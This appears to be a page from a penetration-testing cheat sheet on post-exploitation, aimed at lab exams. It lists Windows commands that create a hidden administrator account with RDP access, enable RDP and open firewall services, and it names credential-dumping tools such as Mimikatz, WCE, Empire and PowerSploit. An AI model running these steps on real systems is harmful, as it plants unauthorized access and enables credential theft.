search

Post exploitation

Don't.stop.here.you.are.only.halfway.

hashtag
Proof.txt

Linux

cat /root/proof.txt

Windows

type "C:\Documents and Settings\Administrator\Desktop\proof.txt"

hashtag
Windows

hashtag
Add RDP user

net user hodor Qwerty123! /add
net localgroup administrators hodor /add
net localgroup "Remote Desktop Users" hodor /add

hashtag
Enable RDP

Via registry:

reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0

Add firewall rule:

netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable

hashtag
Rdesktop resolution

hashtag
Passwords and hashes

hashtag
Mimikatz

Extract passwords, keys, pin codes, tickets from "lsass" memory:

Pass-the-hash

Elevate token

Dump SAM

hashtag
Windows Credential Editor (WCE)

Security tool that can be used to extract cleartext passwords and NTLM hashes from a Windows host. Administrator privileges are required.

LogoAmplia Security - Research - Windows Credentials Editor (WCE)www.ampliasecurity.comchevron-right

hashtag
Networking

Is there a connection with another host?

Hosts file

Firewall config

hashtag
PowerShell tools

hashtag
Empire

LogoGitHub - EmpireProject/Empire: Empire is a PowerShell and Python post-exploitation agent.GitHubchevron-right

hashtag
PowerSploit

LogoGitHub - PowerShellMafia/PowerSploit: PowerSploit - A PowerShell Post-Exploitation FrameworkGitHubchevron-right

hashtag
Linux

hashtag
Spawn TTY shell

PreviousPrivilege escalationNextLateral movement

Last updated